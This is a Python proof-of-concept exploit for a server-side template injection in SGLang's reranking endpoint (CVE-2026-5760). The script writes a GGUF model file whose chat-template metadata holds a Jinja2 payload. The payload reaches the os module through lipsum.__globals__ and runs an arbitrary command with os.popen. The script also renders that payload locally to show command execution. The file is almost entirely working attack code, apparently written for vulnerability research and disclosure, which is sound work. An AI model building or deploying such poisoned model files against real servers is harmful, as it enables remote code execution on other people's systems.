#!/usr/bin/env python3
"""SGLang Reranking SSTI -> RCE — CVE-2026-5760 PoC. Discovered by @stuub""""

import sys
import os
import tempfile
import numpy as np
from gguf import GGUFWriter

# Jinja2 chat template that create_malicious_gguf() stores in the GGUF
# metadata and that exploit() renders. In order, it:
#   1. emits a fixed instruction line,
#   2. evaluates an expression that reaches the `os` module through the
#      globals of Jinja2's `lipsum` helper and runs `cmd` via os.popen(),
#   3. concatenates the "content" field of every entry in `messages`.
# NOTE: `cmd` is a template variable resolved at render time; no command is
# baked into this string.
PAYLOAD = 'The answer can only be "yes" or "no".\n{{ lipsum.__globals__["os"].popen(cmd).read() }}{% for message in messages %}{{ message["content"] }}{% endfor %}'

def create_malicious_gguf(path, cmd="id"):
    """Write a minimal GGUF file whose chat template is ``PAYLOAD``.

    The file declares a ``qwen3`` architecture named ``qwen3-reranker`` with
    one block, one attention head, a 2048-token context, an embedding length
    of 128, and a single all-zero 128x128 float32 ``token_embd.weight``
    tensor.

    Args:
        path: Destination path of the GGUF file.
        cmd: Accepted for call-site compatibility but not used here. The
            template is written verbatim and refers to ``cmd`` only as a
            render-time variable.
    """
    writer = GGUFWriter(path, arch="qwen3")
    try:
        # Metadata key/value pairs, kept in their original insertion order.
        writer.add_name("qwen3-reranker")
        writer.add_file_type(0)
        writer.add_context_length(2048)
        writer.add_embedding_length(128)
        writer.add_block_count(1)
        writer.add_head_count(1)
        writer.add_head_count_kv(1)
        writer.add_chat_template(PAYLOAD)

        # Single placeholder tensor; its values are all zeros.
        writer.add_tensor(
            "token_embd.weight",
            np.zeros((128, 128), dtype=np.float32),
        )

        # Header, then key/value metadata, then tensor data.
        writer.write_header_to_file()
        writer.write_kv_data_to_file()
        writer.write_tensors_to_file()
    finally:
        # Release the output handle even when one of the steps above raises;
        # previously close() was only reached on the success path.
        writer.close()

def exploit(cmd="id"):
    """Render ``PAYLOAD`` locally in a non-sandboxed Jinja2 environment.

    According to the original author's note, the environment built here
    matches the one SGLang's serving_rerank.py creates, where the template
    would be rendered when /v1/rerank is called with a malicious model
    loaded. This function performs that render step directly instead of
    going through a server.

    Args:
        cmd: Value bound to the template variable ``cmd``.

    Returns:
        The rendered template text with leading and trailing whitespace
        stripped.
    """
    from jinja2 import BaseLoader, Environment, Undefined

    # SGLang's _get_jinja_env() — serving_rerank.py:128-132
    env_options = {
        "loader": BaseLoader(),
        "autoescape": False,
        "undefined": Undefined,
    }
    plain_env = Environment(**env_options)

    # One user message with empty content, plus the command variable.
    context = {
        "cmd": cmd,
        "messages": [{"role": "user", "content": ""}],
    }
    rendered = plain_env.from_string(PAYLOAD).render(**context)
    return rendered.strip()

if __name__ == "__main__":
    # The first CLI argument is the command; fall back to "id" when absent.
    cli_args = sys.argv[1:]
    command = cli_args[0] if cli_args else "id"

    # Write the GGUF next to this script and report its path on stderr so
    # that stdout carries only the rendered output.
    script_dir = os.path.dirname(__file__)
    target = os.path.join(script_dir, "malicious_reranker.gguf")
    create_malicious_gguf(target, command)
    print(f"[+] {target}", file=sys.stderr)

    print(exploit(command))